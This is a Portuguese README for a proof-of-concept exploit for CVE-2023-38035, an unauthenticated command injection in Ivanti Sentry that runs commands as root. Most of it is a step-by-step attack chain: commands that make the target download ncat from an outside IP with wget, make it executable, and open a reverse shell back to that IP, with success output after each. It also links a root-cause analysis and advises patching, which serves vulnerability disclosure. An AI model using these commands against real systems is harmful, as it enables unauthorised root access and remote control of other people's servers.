
Exploit de prova de conceito para CVE-2023-38035, uma injeção de comando não autenticada no Ivanti Sentry que permite execução arbitrária de comandos como root e shell reverso via ncat.
POC para CVE-2023-38035 afetando Ivanti Sentry
Uma análise técnica da causa raiz da vulnerabilidade pode ser encontrada em nosso blog: https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive
Este POC abusa de uma injeção de comando não autenticada para executar comandos arbitrários como usuário root.
O contexto de execução não permite pipe de comandos, e o sistema não vem com binários facilmente abusáveis, então comandos podem ser encadeados para baixar um ncat estático de algum lugar como https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat.
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'wget http://123.123.123.123:8000/ncat -O /tmp/ncat'
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'chmod +x /tmp/ncat'
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'sudo /tmp/ncat 123.123.123.123 4444 -e /bin/sh'
[+] Successfully executed command on target!

Atualize para a versão mais recente de acordo com as instruções no Aviso da Ivanti
Este software foi criado puramente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usado para atacar sistemas, exceto quando explicitamente autorizado. Os mantenedores do projeto não são responsáveis pelo uso indevido do software. Use com responsabilidade.